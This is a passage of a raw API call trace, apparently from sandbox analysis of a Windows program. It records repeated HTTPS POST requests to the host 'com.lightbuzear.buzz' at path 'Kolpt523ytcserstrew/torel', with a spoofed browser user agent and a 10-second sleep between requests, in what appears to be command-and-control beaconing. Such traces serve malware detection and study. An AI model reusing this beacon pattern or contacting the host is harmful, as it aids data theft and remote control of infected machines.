HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be898 | out: hHeap=0x4780000) returned 1 [0273.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0273.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beac8 [0273.809] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0273.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be9b0 [0273.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edc8 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0273.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ee40 [0273.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be7f8 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be7f8 | out: hHeap=0x4780000) returned 1 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0273.811] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eea0 [0273.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0273.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0273.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eea0 | out: hHeap=0x4780000) returned 1 [0273.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0273.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0273.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bea00 [0273.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0273.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0273.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0273.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be988 [0273.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0273.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb40 [0273.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0273.813] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0273.813] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0273.813] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efa8 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee58 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0273.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0273.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0273.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be820 [0273.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0273.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0273.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be820 | out: hHeap=0x4780000) returned 1 [0273.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec08 [0273.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0273.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be9d8 [0273.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0273.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0273.816] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0273.816] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0275.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be9d8 | out: hHeap=0x4780000) returned 1 [0275.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0275.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0275.555] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0275.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0275.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0275.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be9d8 [0275.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0275.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0275.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be9d8 | out: hHeap=0x4780000) returned 1 [0275.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb18 [0275.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0275.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb40 [0275.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0275.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0275.558] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0275.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0275.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0275.559] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0275.559] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0275.559] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0275.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0275.559] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0275.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0275.559] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed98 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee58 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47beb40 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0275.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be820 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0275.560] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0275.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0275.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0275.561] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0275.561] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0275.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0275.562] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0275.563] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0275.563] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0275.563] FreeLibrary (hLibModule=0x71570000) returned 1 [0275.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0275.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be9b0 | out: hHeap=0x4780000) returned 1 [0275.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beac8 | out: hHeap=0x4780000) returned 1 [0275.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec80 | out: hHeap=0x4780000) returned 1 [0275.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0275.564] Sleep (dwMilliseconds=0x2710) [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0275.672] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0275.672] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eeb8 [0275.673] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0275.673] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0275.673] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0275.673] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0275.673] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0275.674] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0275.674] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0275.674] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0275.674] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed98 [0275.674] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0275.674] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0275.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0275.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bec80 [0275.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0275.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0275.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec80 | out: hHeap=0x4780000) returned 1 [0275.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec58 [0275.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0275.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be870 [0275.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0275.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0275.676] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0275.676] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0275.676] FreeLibrary (hLibModule=0x71780000) returned 1 [0275.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be870 | out: hHeap=0x4780000) returned 1 [0275.677] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0275.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0275.677] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0275.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0275.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0275.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0275.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0275.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0275.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eea0 [0275.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0275.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0275.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eea0 | out: hHeap=0x4780000) returned 1 [0275.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ee58 [0275.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be9b0 [0275.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be9b0 | out: hHeap=0x4780000) returned 1 [0275.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0275.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0275.679] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0275.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be910 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed98 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0275.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eea0 [0275.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec80 [0275.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec80 | out: hHeap=0x4780000) returned 1 [0275.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0275.681] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, 